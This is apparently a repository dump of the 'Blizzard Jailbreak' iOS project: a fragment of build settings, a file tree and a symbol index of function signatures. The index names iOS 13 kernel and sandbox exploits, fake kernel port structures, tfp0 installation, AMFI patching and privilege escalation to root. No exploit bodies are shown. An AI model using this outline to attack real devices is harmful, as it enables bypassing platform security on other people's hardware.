CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE;
CLANG_CXX_LANGUAGE_STANDARD = "gnu++14";
CLANG_CXX_LIBRARY = "libc++";
CLANG_ENABLE_MODULES = YES;
CLANG_ENABLE_OBJC_ARC = YES;
CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES;
CLANG_WARN_BOOL_CONVERSION = YES;
CLANG_WARN_COMMA = YES;
CLANG_WARN_CONSTANT_CONVERSION = YES;
CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES;
CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR;
CLANG_WARN_DOCUMENTATION_COMMENTS = YES;
CLANG_WARN_EMPTY_BODY = YES;
CLANG_WARN_ENUM_CONVERSION = YES;
CLANG_WARN_INFINITE_RECURSION = YES;
CLANG_WARN_INT_CONVERSION = YES;
CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES;
CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES;
CLANG_WARN_OBJC_LITERAL_CONVERSION = YES;
CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR;
CLANG_WARN_RANGE_LOOP_ANALYSIS = YES;
CLANG_WARN_STRICT_PROTOTYPES = YES;
CLANG_WARN_SUSPICIOUS_MOVE = YES;
CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE;
CLANG_WARN_UNREACHABLE_CODE = YES;
CLANG_WARN__DUPLICATE_METHOD_MATCH = YES;
CODE_SIGN_IDENTITY = "iPhone Developer";
COPY_PHASE_STRIP = NO;
DEBUG_INFORMATION_FORMAT = dwarf;
ENABLE_STRICT_OBJC_MSGSEND = YES;
ENABLE_TESTABILITY = YES;
GCC_C_LANGUAGE_STANDARD = gnu
gitextract_8ln0kc37/
├── .gitignore
├── AMFI Utilities/
│ ├── amfi_utils.h
│ ├── amfi_utils.m
│ ├── amfid.h
│ ├── amfid.m
│ ├── amfid_mem.h
│ ├── amfid_mem.m
│ ├── amfid_tools.h
│ ├── amfid_tools.m
│ ├── cs_blob.h
│ ├── osobject.c
│ └── osobject.h
├── APFS Utilities/
│ ├── IOKit.h
│ ├── liboffsetfinder64.hpp
│ ├── offsetfinder.cpp
│ ├── rootfs_remount.h
│ ├── rootfs_remount.m
│ ├── snapshot_tools.c
│ └── snapshot_tools.h
├── Base Binaries/
│ └── tar
├── Blizzard Jailbreak/
│ ├── AppDelegate.h
│ ├── AppDelegate.m
│ ├── Assets.xcassets/
│ │ ├── AppIcon.appiconset/
│ │ │ └── Contents.json
│ │ ├── Contents.json
│ │ ├── button_mask.imageset/
│ │ │ └── Contents.json
│ │ ├── jailbreak_wallpaper.imageset/
│ │ │ └── Contents.json
│ │ ├── snow.imageset/
│ │ │ └── Contents.json
│ │ └── winter.imageset/
│ │ └── Contents.json
│ ├── Base.lproj/
│ │ ├── LaunchScreen.storyboard
│ │ └── Main.storyboard
│ ├── BlizzardLog.h
│ ├── BlizzardLog.m
│ ├── BlizzardSpawnerTools.c
│ ├── BlizzardSpawnerTools.h
│ ├── Info.plist
│ ├── blizzardJailbreak.h
│ ├── blizzardJailbreak.m
│ ├── blizzardView.h
│ ├── blizzardView.m
│ └── main.m
├── Blizzard Jailbreak.xcodeproj/
│ ├── project.pbxproj
│ ├── project.xcworkspace/
│ │ ├── contents.xcworkspacedata
│ │ ├── xcshareddata/
│ │ │ └── IDEWorkspaceChecks.plist
│ │ └── xcuserdata/
│ │ ├── geosn0w.xcuserdatad/
│ │ │ └── UserInterfaceState.xcuserstate
│ │ ├── jakejames.xcuserdatad/
│ │ │ └── UserInterfaceState.xcuserstate
│ │ └── pwn20wnd.xcuserdatad/
│ │ └── UserInterfaceState.xcuserstate
│ ├── xcshareddata/
│ │ └── xcschemes/
│ │ └── sock_port.xcscheme
│ └── xcuserdata/
│ ├── geosn0w.xcuserdatad/
│ │ └── xcdebugger/
│ │ └── Breakpoints_v2.xcbkptlist
│ ├── jakejames.xcuserdatad/
│ │ ├── xcdebugger/
│ │ │ └── Breakpoints_v2.xcbkptlist
│ │ └── xcschemes/
│ │ └── xcschememanagement.plist
│ └── pwn20wnd.xcuserdatad/
│ └── xcschemes/
│ └── xcschememanagement.plist
├── Exploits/
│ ├── FreeTheSandbox/
│ │ ├── IOTypes.h
│ │ ├── freethesandbox.h
│ │ ├── ios13_change_offsets.m
│ │ ├── ios13_kernel_universal.c
│ │ ├── ios13_userspace.c
│ │ ├── ios13_userspace_pac.c
│ │ ├── ios_7st_utils.m
│ │ ├── libsnappy.c
│ │ ├── libsnappy.h
│ │ ├── vnode.h
│ │ └── xpc.h
│ ├── IOKit/
│ │ ├── IOKitKeys.h
│ │ ├── IOKitLib.h
│ │ ├── IOReturn.h
│ │ └── IOTypes.h
│ └── sock_port/
│ ├── exploit.c
│ ├── exploit.h
│ ├── exploit_utilities.c
│ ├── exploit_utilities.h
│ ├── include/
│ │ └── IOKit/
│ │ ├── IOKitKeys.h
│ │ ├── IOKitLib.h
│ │ ├── IOReturn.h
│ │ ├── IOTypes.h
│ │ └── OSMessageNotification.h
│ ├── iosurface.c
│ ├── iosurface.h
│ ├── kernel_memory.c
│ ├── kernel_memory.h
│ ├── offsetof.c
│ ├── offsetof.h
│ ├── offsets.h
│ └── offsets.m
├── Helper Libraries/
│ ├── libimg4tool.a
│ ├── libmerged.a
│ ├── liboffsetfinder64.a
│ ├── libplist++.a
│ └── libplist.a
├── Kernel Utilities/
│ ├── kernSymbolication.c
│ ├── kernSymbolication.h
│ ├── kernel_utils.h
│ ├── kernel_utils.m
│ ├── kexecute.c
│ ├── kexecute.h
│ ├── lzssdec.cpp
│ ├── lzssdec.hpp
│ └── system_reboot.h
├── LICENSE
├── PatchFinder/
│ ├── patchfinder64.h
│ └── patchfinder64.m
├── README.md
└── Vanity/
└── readme.md
SYMBOL INDEX (442 symbols across 36 files)
FILE: AMFI Utilities/amfi_utils.h
type trust_chain (line 9) | struct trust_chain {
type cs_hash (line 27) | struct cs_hash
FILE: AMFI Utilities/amfid.h
type exception_raise_request (line 26) | typedef struct {
type exception_raise_reply (line 34) | typedef struct {
FILE: AMFI Utilities/cs_blob.h
type CodeDirectory (line 5) | typedef struct __attribute__((packed)) {
type CS_BlobIndex (line 43) | typedef struct __attribute__((packed)) {
type CS_SuperBlob (line 48) | typedef struct __attribute__((packed)) {
type SC_Scatter (line 56) | typedef struct __SC_Scatter {
type CS_GenericBlob (line 128) | typedef struct __SC_GenericBlob {
type CS_CodeDirectory (line 137) | typedef struct __CodeDirectory {
type cs_blob (line 182) | struct cs_blob {
type cs_hash (line 220) | struct cs_hash {
FILE: AMFI Utilities/osobject.c
function OSDictionary_SetItem (line 19) | int OSDictionary_SetItem(uint64_t dict, const char *key, uint64_t val) {
function _OSDictionary_GetItem (line 30) | uint64_t _OSDictionary_GetItem(uint64_t dict, const char *key) {
function OSDictionary_GetItem (line 41) | uint64_t OSDictionary_GetItem(uint64_t dict, const char *key) {
function OSDictionary_Merge (line 49) | int OSDictionary_Merge(uint64_t dict, uint64_t aDict) {
function OSArray_Merge (line 55) | int OSArray_Merge(uint64_t array, uint64_t aArray) {
function _OSArray_GetObject (line 61) | uint64_t _OSArray_GetObject(uint64_t array, unsigned int idx){
function OSArray_GetObject (line 67) | uint64_t OSArray_GetObject(uint64_t array, unsigned int idx){
function OSArray_RemoveObject (line 75) | void OSArray_RemoveObject(uint64_t array, unsigned int idx){
function _OSUnserializeXML (line 80) | uint64_t _OSUnserializeXML(const char* buffer) {
function OSUnserializeXML (line 90) | uint64_t OSUnserializeXML(const char* buffer) {
function OSObject_Release (line 98) | void OSObject_Release(uint64_t osobject) {
function OSObject_Retain (line 104) | void OSObject_Retain(uint64_t osobject) {
function OSObject_GetRetainCount (line 110) | uint32_t OSObject_GetRetainCount(uint64_t osobject) {
function OSString_GetLength (line 116) | unsigned int OSString_GetLength(uint64_t osstring){
FILE: APFS Utilities/IOKit.h
type mach_port_t (line 14) | typedef mach_port_t io_service_t;
type mach_port_t (line 15) | typedef mach_port_t io_connect_t;
type mach_port_t (line 16) | typedef mach_port_t io_object_t;
type io_object_t (line 17) | typedef io_object_t io_registry_entry_t;
FILE: APFS Utilities/liboffsetfinder64.hpp
type tihmstar (line 22) | namespace tihmstar {
class exception (line 23) | class exception : public std::exception{
method exception (line 27) | exception(int code, std::string err) : _err(err), _code(code) {}
method exception (line 28) | exception(std::string err) : _err(err), _code(0) {}
method exception (line 29) | exception(int code) : _code(code) {}
method code (line 31) | int code(){return _code;}
type patchfinder64 (line 33) | namespace patchfinder64{
class patch (line 36) | class patch{
class patch (line 38) | class patch
method patch (line 43) | patch(loc_t location, const void *patch, size_t patchSize, void(*s...
method patch (line 48) | patch(const patch& cpy) : _location(cpy._location), _patchSize(cpy...
method slide (line 54) | void slide(uint64_t slide){
class offsetfinder64 (line 67) | class offsetfinder64 {
type text_t (line 69) | struct text_t{
type symtab_command (line 84) | struct symtab_command
type symtab_command (line 86) | struct symtab_command
type patchfinder64 (line 158) | namespace patchfinder64{
class patch (line 36) | class patch{
class patch (line 38) | class patch
method patch (line 43) | patch(loc_t location, const void *patch, size_t patchSize, void(*s...
method patch (line 48) | patch(const patch& cpy) : _location(cpy._location), _patchSize(cpy...
method slide (line 54) | void slide(uint64_t slide){
FILE: APFS Utilities/offsetfinder.cpp
function offsetizeRN (line 17) | bool offsetizeRN(uint64_t slide){
FILE: APFS Utilities/snapshot_tools.c
type val_attrs_t (line 14) | typedef struct val_attrs {
function list_snapshots (line 20) | int list_snapshots(const char *vol){
function createNewAPFSSnapshot (line 99) | int createNewAPFSSnapshot(const char *volume, const char *snapshot) {
function renameAPFSSnapshot (line 118) | int renameAPFSSnapshot(const char *volume, const char *snapshot, const c...
function verifySnapshot (line 135) | int verifySnapshot(const char *vol, const char *name){
function mountSnapshot (line 165) | int mountSnapshot(const char *vol, const char *name, const char *dir) {
FILE: Blizzard Jailbreak/BlizzardSpawnerTools.c
function launchProcessFrozen (line 21) | int launchProcessFrozen(char *whom, char *arg1, char *arg2, char *arg3, ...
FILE: Exploits/FreeTheSandbox/IOTypes.h
type UInt (line 58) | typedef unsigned int UInt;
type SInt (line 59) | typedef signed int SInt;
type UInt32 (line 62) | typedef UInt32 IOOptionBits;
type SInt32 (line 63) | typedef SInt32 IOFixed;
type UInt32 (line 64) | typedef UInt32 IOVersion;
type UInt32 (line 65) | typedef UInt32 IOItemCount;
type UInt32 (line 66) | typedef UInt32 IOCacheMode;
type UInt32 (line 68) | typedef UInt32 IOByteCount32;
type UInt64 (line 69) | typedef UInt64 IOByteCount64;
type UInt32 (line 71) | typedef UInt32 IOPhysicalAddress32;
type UInt64 (line 72) | typedef UInt64 IOPhysicalAddress64;
type UInt32 (line 73) | typedef UInt32 IOPhysicalLength32;
type UInt64 (line 74) | typedef UInt64 IOPhysicalLength64;
type mach_vm_address_t (line 77) | typedef mach_vm_address_t IOVirtualAddress;
type vm_address_t (line 79) | typedef vm_address_t IOVirtualAddress;
type IOByteCount64 (line 83) | typedef IOByteCount64 IOByteCount;
type IOByteCount32 (line 85) | typedef IOByteCount32 IOByteCount;
type IOVirtualAddress (line 88) | typedef IOVirtualAddress IOLogicalAddress;
type IOPhysicalAddress64 (line 92) | typedef IOPhysicalAddress64 IOPhysicalAddress;
type IOPhysicalLength64 (line 93) | typedef IOPhysicalLength64 IOPhysicalLength;
type IOPhysicalAddress32 (line 99) | typedef IOPhysicalAddress32 IOPhysicalAddress;
type IOPhysicalLength32 (line 100) | typedef IOPhysicalLength32 IOPhysicalLength;
type IOPhysicalRange (line 107) | typedef struct
type IOVirtualRange (line 113) | typedef struct
type IOVirtualRange (line 120) | typedef IOVirtualRange IOAddressRange;
type IOAddressRange (line 122) | typedef struct
type IONamedValue (line 132) | typedef struct {
type IOAlignment (line 141) | typedef unsigned int IOAlignment;
type mach_port_t (line 156) | typedef mach_port_t io_object_t;
type io_object_t (line 161) | typedef io_object_t io_connect_t;
type io_object_t (line 162) | typedef io_object_t io_enumerator_t;
type io_object_t (line 163) | typedef io_object_t io_iterator_t;
type io_object_t (line 164) | typedef io_object_t io_registry_entry_t;
type io_object_t (line 165) | typedef io_object_t io_service_t;
type IODeviceNumber (line 234) | typedef unsigned int IODeviceNumber;
FILE: Exploits/FreeTheSandbox/ios13_kernel_universal.c
type ipc_port (line 101) | struct ipc_port {
type task (line 143) | struct task
function pth_commAttr_init (line 187) | void pth_commAttr_init(){
function check_num_stringlizability_4bytes (line 192) | bool check_num_stringlizability_4bytes(uint32_t input_num){
function IOSurfaceRootUserClient_remove_surface_map (line 201) | void IOSurfaceRootUserClient_remove_surface_map(io_connect_t ioconn, uin...
function IOSurfaceRootUserClient_create_surface_map (line 207) | uint32_t IOSurfaceRootUserClient_create_surface_map(io_connect_t ioconn,...
function KernelRead_1byte (line 250) | uint8_t KernelRead_1byte(uint64_t rAddr){
function KernelRead_2bytes (line 260) | uint16_t KernelRead_2bytes(uint64_t rAddr){
function KernelRead_4bytes (line 270) | uint32_t KernelRead_4bytes(uint64_t rAddr){
function KernelRead_8bytes (line 280) | uint64_t KernelRead_8bytes(uint64_t rAddr){
function KernelRead_anySize (line 292) | void KernelRead_anySize(uint64_t rAddr, char *outbuf, size_t outbuf_len){
function KernelWrite_1byte (line 307) | void KernelWrite_1byte(uint64_t wAddr, uint8_t wData){
function KernelWrite_2bytes (line 317) | void KernelWrite_2bytes(uint64_t wAddr, uint16_t wData){
function KernelWrite_4bytes (line 327) | void KernelWrite_4bytes(uint64_t wAddr, uint32_t wData){
function KernelWrite_8bytes (line 335) | void KernelWrite_8bytes(uint64_t wAddr, uint64_t wData){
function KernelWrite_anySize (line 344) | void KernelWrite_anySize(uint64_t wAddr, char *inputbuf, uint32_t inputb...
function KernelAllocate (line 354) | uint64_t KernelAllocate(size_t len){
function KernelDeallocate (line 360) | void KernelDeallocate(uint64_t addr, size_t len){
function KernelUti_GenerateOffset (line 364) | uint32_t KernelUti_GenerateOffset(uint64_t src, uint64_t data_in_src){
function kernel_exp_start (line 395) | void kernel_exp_start(io_connect_t ave_ioconn, io_connect_t surface_ioco...
function race_kmem2 (line 406) | void race_kmem2(){
function alloc_kernel_40_mem (line 413) | uint64_t alloc_kernel_40_mem(){
function empty_kernel_40_mem (line 444) | void empty_kernel_40_mem(uint64_t target_addr){
function alloc_kernel_40_mem_contains_iosurfacebuf (line 469) | uint64_t alloc_kernel_40_mem_contains_iosurfacebuf(){
function release_kernel_40_mem (line 501) | void release_kernel_40_mem(uint64_t user_iosurfaceinfo_buf){
function IOSurfaceRootUserClient_sRemoveValue (line 529) | void IOSurfaceRootUserClient_sRemoveValue(uint32_t spray_id, uint32_t key){
function _temp_kernel_reading_threadFunc (line 570) | void _temp_kernel_reading_threadFunc(){
function temp_kernel_reading (line 595) | uint64_t temp_kernel_reading(uint64_t target_addr){
function _temp_kernel_reading_categ3_threadFunc (line 649) | void _temp_kernel_reading_categ3_threadFunc(){
function temp_kernel_reading_categ3 (line 674) | uint32_t temp_kernel_reading_categ3(uint64_t target_addr){
function _temp_kernel_reading_bypass_kaslr_threadFunc (line 729) | void _temp_kernel_reading_bypass_kaslr_threadFunc(){
function temp_kernel_reading_categ5 (line 754) | uint32_t temp_kernel_reading_categ5(uint64_t target_addr){
function temp_kernel_reading_insert_valid_kaddr (line 806) | void temp_kernel_reading_insert_valid_kaddr(uint64_t target_addr){
function _temp_kernel_reading_release_mem_threadFunc (line 830) | void _temp_kernel_reading_release_mem_threadFunc(){
function temp_kernel_reading_release_mem (line 854) | uint32_t temp_kernel_reading_release_mem(uint64_t target_addr){
function prep_new_reading_primi (line 900) | void prep_new_reading_primi(){
function new_reading_primitive (line 926) | uint32_t new_reading_primitive(uint64_t target_addr){
function new_writing_primi (line 973) | void new_writing_primi(uint64_t target_addr, uint32_t write_data){
function build_fake_task_stru_forReadMem (line 996) | void build_fake_task_stru_forReadMem(char *faketask, uint64_t target_addr){
function build_fake_ipc_port_stru (line 1005) | void build_fake_ipc_port_stru(struct ipc_port *fakeport, uint64_t specif...
function build_fake_task_stru_forTFP0 (line 1024) | void build_fake_task_stru_forTFP0(struct task *faketask){
function Init_spraydata_for_TT1 (line 1047) | void Init_spraydata_for_TT1(uint32_t spray_id){
function TT1_send_spray (line 1068) | void TT1_send_spray(){
function Init_spraydata_for_TT2 (line 1091) | void Init_spraydata_for_TT2(uint32_t spray_id){
function TT2_send_spray (line 1111) | void TT2_send_spray(){
function TT2_send_spray_smallspray (line 1128) | void TT2_send_spray_smallspray(){
function TT2_release_all (line 1145) | void TT2_release_all(){
function add_new_client (line 1155) | uint8_t add_new_client(){
function remove_client (line 1170) | void remove_client(){
function encode_client_normal (line 1179) | void encode_client_normal(uint8_t isFor_finalCleaning){
function encode_client_normal222 (line 1235) | void encode_client_normal222(){
function spray_client (line 1288) | void spray_client(){
function check_if_valid_kernel_ptr (line 1392) | uint8_t check_if_valid_kernel_ptr(uint64_t target_ptr){
function find_proc_byPID (line 1398) | uint64_t find_proc_byPID(pid_t target_pid) {
function pid_t (line 1420) | pid_t look_for_proc(char *proc_name){
function pid_t (line 1450) | pid_t look_for_proc_basename(char *proc_name){
type paveway_sprayAddrs_pack (line 1476) | struct paveway_sprayAddrs_pack{
type paveway_sprayAddrs_pack (line 1480) | struct paveway_sprayAddrs_pack
function hohoo (line 1483) | uint64_t hohoo(){
function hohoo222 (line 1624) | void hohoo222(){
function clean_up_everything (line 1746) | void clean_up_everything(){
function prep_redirect_prev_clientbuf (line 1753) | void prep_redirect_prev_clientbuf(uint64_t new_prev_clientbuf){
function prep_fake_clientbuf (line 1761) | void prep_fake_clientbuf(uint64_t genuine_UserClient_kobj){
function clean_fake_clientbuf (line 1788) | void clean_fake_clientbuf(){
function prep_fake_clientbuf_read (line 1798) | void prep_fake_clientbuf_read(uint64_t genuine_UserClient_kobj){
function run_post_exp (line 1815) | void run_post_exp(){
function KernelLeak_portAddr (line 1837) | uint64_t KernelLeak_portAddr(uint64_t target_task, uint32_t portname){
function KernelLeak_portAddr2 (line 1855) | uint32_t KernelLeak_portAddr2(uint64_t target_task, uint64_t portStru){
function patch_install_tfp0 (line 1869) | void patch_install_tfp0(uint64_t target_task, uint64_t safe_tfp0){
function patch_remove_tfp0 (line 1873) | void patch_remove_tfp0(uint64_t target_task){
function mach_port_t (line 1877) | mach_port_t patch_retrieve_tfp0(){
function patch_TF_PLATFORM (line 1883) | void patch_TF_PLATFORM(uint64_t target_task){
function ubc_cs_blob_get (line 1891) | uint64_t ubc_cs_blob_get(uint64_t vp, int cputype, uint64_t offset){
function patch_CS_PLATFORM_BINARY (line 1911) | void patch_CS_PLATFORM_BINARY(uint64_t target_proc){
function patch_unsandbox_and_root (line 1922) | void patch_unsandbox_and_root(uint64_t target_proc, bool patch_root){
function safepatch_swap_unsandbox_and_root (line 1949) | void safepatch_swap_unsandbox_and_root(uint64_t target_proc){
function safepatch_unswap_unsandbox_and_root (line 1974) | void safepatch_unswap_unsandbox_and_root(uint64_t target_proc){
function safepatch_swap_kernel_cred (line 1988) | void safepatch_swap_kernel_cred(uint64_t target_proc){
function safepatch_unswap_kernel_cred (line 1997) | void safepatch_unswap_kernel_cred(uint64_t target_proc){
function safepatch_swap_spindump_cred (line 2005) | void safepatch_swap_spindump_cred(uint64_t target_proc){
function safepatch_unswap_spindump_cred (line 2034) | void safepatch_unswap_spindump_cred(uint64_t target_proc){
function safepatch_swap_containermanagerd_cred (line 2050) | void safepatch_swap_containermanagerd_cred(uint64_t target_proc){
function safepatch_unswap_containermanagerd_cred (line 2069) | void safepatch_unswap_containermanagerd_cred(uint64_t target_proc){
function patch_root (line 2073) | void patch_root(uint64_t target_proc){
function seek_out_proc_who_request_tfp0 (line 2093) | uint64_t seek_out_proc_who_request_tfp0() {
function build_tfp0_persistence_for_research_purpose (line 2127) | void build_tfp0_persistence_for_research_purpose(){
function ios13_kernel_pwn (line 2171) | void ios13_kernel_pwn(io_connect_t ioconn, io_connect_t surface_ioconn){
function binary_load_addr (line 2507) | uint64_t binary_load_addr(mach_port_t tp) {
function TaskRead_4bytes (line 2542) | uint32_t TaskRead_4bytes(mach_port_t task, uint64_t rAddr){
function TaskRead_8bytes (line 2549) | uint64_t TaskRead_8bytes(mach_port_t task, uint64_t rAddr){
function TaskWrite_1byte (line 2556) | void TaskWrite_1byte(mach_port_t task, uint64_t wAddr, uint8_t wData){
function TaskWrite_4bytes (line 2560) | void TaskWrite_4bytes(mach_port_t task, uint64_t wAddr, uint32_t wData){
function TaskWrite_8bytes (line 2564) | void TaskWrite_8bytes(mach_port_t task, uint64_t wAddr, uint64_t wData){
function TaskWrite_anySize (line 2568) | void TaskWrite_anySize(mach_port_t task, uint64_t wAddr, char *inputbuf,...
function TaskAllocate (line 2572) | uint64_t TaskAllocate(mach_port_t task, size_t len){
function TaskDeallocate (line 2578) | void TaskDeallocate(mach_port_t task, uint64_t addr, size_t len){
type exception_raise_request (line 2597) | typedef struct {
type exception_raise_reply (line 2605) | typedef struct {
type cdHashType (line 2626) | enum cdHashType {
type cdHashType (line 2633) | enum cdHashType
function set_exception_handler (line 2867) | void set_exception_handler(mach_port_t amfid_task_port){
function patch_amfid (line 2889) | void patch_amfid(pid_t amfid_pid){
function find_amfid_OFFSET_MISValidate_symbol (line 2909) | uint64_t find_amfid_OFFSET_MISValidate_symbol(uint8_t *amfid_macho){
function find_amfid_OFFSET_gadget (line 2969) | uint64_t find_amfid_OFFSET_gadget(uint8_t *amfid_macho){
type stat (line 3004) | struct stat
function display_ip_address (line 3025) | void display_ip_address(){
function remove_crash_thats_caused_by_exp (line 3045) | void remove_crash_thats_caused_by_exp(const char *name)
function run_post_exp_from_tfp0 (line 3065) | void run_post_exp_from_tfp0(){
FILE: Exploits/FreeTheSandbox/ios13_userspace.c
type mach_msg_guard_flags_t (line 56) | typedef unsigned int mach_msg_guard_flags_t;
function Prepare_our_Mach_server (line 72) | void Prepare_our_Mach_server(){
function isPartOf_dyldcache (line 86) | bool isPartOf_dyldcache(vm_address_t addr){
function Get_loaded_dylib_size (line 98) | size_t Get_loaded_dylib_size(void *dylib_address){
function Find_dylibcache (line 119) | void Find_dylibcache(){
function find_gadget (line 152) | uint64_t find_gadget(char *bytes, size_t len){
function find_gadget_speed (line 161) | uint64_t find_gadget_speed(char *bytes, size_t len, void *findingRange_s...
function Find_Gadgets_speed (line 221) | void Find_Gadgets_speed(){
function get_server_port (line 249) | uint32_t get_server_port(char *servername){
function mach_msg_conn_test (line 261) | void mach_msg_conn_test(){
function click_test_main (line 313) | void click_test_main(){
function xpc_conn_test (line 317) | void xpc_conn_test(){
function xpc_conn_test_exp1 (line 346) | void xpc_conn_test_exp1(){
function xpc_conn_test_forTrigger (line 387) | void xpc_conn_test_forTrigger(){
function Assemble_part2_AOP (line 418) | void Assemble_part2_AOP(uint64_t *spraymem, uint64_t spray_start_address){
function Assemble_part1_ROP (line 617) | void Assemble_part1_ROP(uint64_t *rop2_stack, uint64_t rop2_start_address){
function xpc_conn_test_exp2 (line 634) | void xpc_conn_test_exp2(){
function Retrieve_symptomsd_bootstrap_port (line 703) | uint32_t Retrieve_symptomsd_bootstrap_port(){
function Send_our_serverport (line 714) | bool Send_our_serverport(){
function mach_port_t (line 761) | mach_port_t Retrieve_symptomsd_task_port(){
function Send_overwritting_iosurfaceMap (line 779) | void Send_overwritting_iosurfaceMap(uint64_t remote_map_addr, uint64_t *...
function Reply_notify_completion (line 806) | void Reply_notify_completion(){
function Send_notify_msg (line 816) | void Send_notify_msg(){
function new_guard_thing_test (line 829) | void new_guard_thing_test(){
function io_test (line 848) | void io_test(){
function kern_return_t (line 883) | kern_return_t print_all_ports(){
function trit (line 961) | void trit (io_iterator_t it,int index){
function print_cbuf (line 980) | void print_cbuf(uint8_t *buf, size_t len){
function Send_overwritting_iosurfaceMap22 (line 991) | void Send_overwritting_iosurfaceMap22(uint64_t our_data_addr, uint64_t o...
function print_char (line 1010) | void print_char(uint8_t *data_ptr, size_t data_size){
function iOS13_exploit_init (line 1021) | void iOS13_exploit_init(){
FILE: Exploits/FreeTheSandbox/ios13_userspace_pac.c
function PACSupport_pacdza (line 49) | uint64_t PACSupport_pacdza(uint64_t data_ptr){
function PACSupport_paciza (line 62) | uint64_t PACSupport_paciza(uint64_t code_ptr){
function PACSupport_pacia (line 75) | uint64_t PACSupport_pacia(uint64_t code_ptr, uint64_t modifier){
function PACSupport_xpaci (line 85) | uint64_t PACSupport_xpaci(void *code_ptr){
function PACSupport_addMask (line 89) | uint64_t PACSupport_addMask(uint64_t data_ptr, uint32_t mask){
function isPartOf_dyldcache (line 109) | bool isPartOf_dyldcache(vm_address_t addr){
function Get_loaded_dylib_size (line 121) | size_t Get_loaded_dylib_size(void *dylib_address){
function Find_dylibcache (line 141) | void Find_dylibcache(){
function find_gadget (line 172) | uint64_t find_gadget(char *bytes, size_t len){
function find_gadget_speed (line 180) | uint64_t find_gadget_speed(char *bytes, size_t len, void *findingRange_s...
function Find_aopGadgets (line 268) | void Find_aopGadgets(){
function Find_aopGadgets_speed (line 306) | void Find_aopGadgets_speed(){
function Assemble_AOP (line 342) | void Assemble_AOP(uint64_t *aop_stack, uint64_t rop_start_address){
function Assemble_AOP2 (line 348) | void Assemble_AOP2(uint64_t *spraymem, uint64_t spray_start_address){
function symptomsd_vuln_prepare1 (line 547) | void symptomsd_vuln_prepare1(){
function symptomsd_vuln_prepare2 (line 589) | void symptomsd_vuln_prepare2(int boo){
function symptomsd_vuln_trigger (line 618) | void symptomsd_vuln_trigger(int boo){
function Prepare_our_Mach_server (line 696) | void Prepare_our_Mach_server(){
function Retrieve_symptomsd_bootstrap_port (line 705) | uint32_t Retrieve_symptomsd_bootstrap_port(){
function Retrieve_midi_bootstrap_port (line 717) | uint32_t Retrieve_midi_bootstrap_port(){
function Send_our_serverport (line 727) | bool Send_our_serverport(){
function mach_port_t (line 774) | mach_port_t Retrieve_symptomsd_task_port(){
function Send_overwritting_iosurfaceMap (line 792) | void Send_overwritting_iosurfaceMap(uint64_t remote_map_addr, uint64_t *...
function Reply_notify_completion (line 819) | void Reply_notify_completion(){
function Send_notify_msg (line 829) | void Send_notify_msg(){
function PACSupport_PACGA (line 840) | uint64_t PACSupport_PACGA(uint64_t code_ptr, uint64_t modifier){
function test_thread (line 850) | void test_thread(){
function exploit_start (line 865) | void exploit_start(){
FILE: Exploits/FreeTheSandbox/libsnappy.c
type mach_port_t (line 22) | typedef mach_port_t io_object_t;
type io_object_t (line 23) | typedef io_object_t io_registry_entry_t;
type UInt32 (line 25) | typedef UInt32 IOOptionBits;
function typedef (line 38) | __attribute__((aligned(4)))
function snapshot_check (line 46) | bool snapshot_check(int dirfd, const char *name)
type attrlist (line 67) | struct attrlist
function sha1_to_str (line 118) | static int sha1_to_str(const unsigned char *hash, size_t hashlen, char *...
FILE: Exploits/FreeTheSandbox/vnode.h
type lck_mtx_t (line 4) | typedef struct {
type vnode_resolve (line 21) | struct vnode_resolve
type kauth_action_t (line 23) | typedef uint32_t kauth_action_t;
type vnode (line 26) | struct vnode {
FILE: Exploits/IOKit/IOKitLib.h
type IONotificationPort (line 67) | struct IONotificationPort
type IOObject (line 1431) | typedef struct IOObject IOObject;
FILE: Exploits/IOKit/IOReturn.h
type kern_return_t (line 45) | typedef kern_return_t IOReturn;
FILE: Exploits/IOKit/IOTypes.h
type UInt (line 58) | typedef unsigned int UInt;
type SInt (line 59) | typedef signed int SInt;
type UInt32 (line 62) | typedef UInt32 IOOptionBits;
type SInt32 (line 63) | typedef SInt32 IOFixed;
type UInt32 (line 64) | typedef UInt32 IOVersion;
type UInt32 (line 65) | typedef UInt32 IOItemCount;
type UInt32 (line 66) | typedef UInt32 IOCacheMode;
type UInt32 (line 68) | typedef UInt32 IOByteCount32;
type UInt64 (line 69) | typedef UInt64 IOByteCount64;
type UInt32 (line 71) | typedef UInt32 IOPhysicalAddress32;
type UInt64 (line 72) | typedef UInt64 IOPhysicalAddress64;
type UInt32 (line 73) | typedef UInt32 IOPhysicalLength32;
type UInt64 (line 74) | typedef UInt64 IOPhysicalLength64;
type mach_vm_address_t (line 77) | typedef mach_vm_address_t IOVirtualAddress;
type vm_address_t (line 79) | typedef vm_address_t IOVirtualAddress;
type IOByteCount64 (line 83) | typedef IOByteCount64 IOByteCount;
type IOByteCount32 (line 85) | typedef IOByteCount32 IOByteCount;
type IOVirtualAddress (line 88) | typedef IOVirtualAddress IOLogicalAddress;
type IOPhysicalAddress64 (line 92) | typedef IOPhysicalAddress64 IOPhysicalAddress;
type IOPhysicalLength64 (line 93) | typedef IOPhysicalLength64 IOPhysicalLength;
type IOPhysicalAddress32 (line 99) | typedef IOPhysicalAddress32 IOPhysicalAddress;
type IOPhysicalLength32 (line 100) | typedef IOPhysicalLength32 IOPhysicalLength;
type IOPhysicalRange (line 107) | typedef struct
type IOVirtualRange (line 113) | typedef struct
type IOVirtualRange (line 120) | typedef IOVirtualRange IOAddressRange;
type IOAddressRange (line 122) | typedef struct
type IONamedValue (line 132) | typedef struct {
type IOAlignment (line 141) | typedef unsigned int IOAlignment;
type mach_port_t (line 156) | typedef mach_port_t io_object_t;
type io_object_t (line 161) | typedef io_object_t io_connect_t;
type io_object_t (line 162) | typedef io_object_t io_enumerator_t;
type io_object_t (line 163) | typedef io_object_t io_iterator_t;
type io_object_t (line 164) | typedef io_object_t io_registry_entry_t;
type io_object_t (line 165) | typedef io_object_t io_service_t;
type IODeviceNumber (line 234) | typedef unsigned int IODeviceNumber;
FILE: Exploits/sock_port/exploit.c
function set_minmtu (line 13) | int set_minmtu(int sock, int *minmtu) {
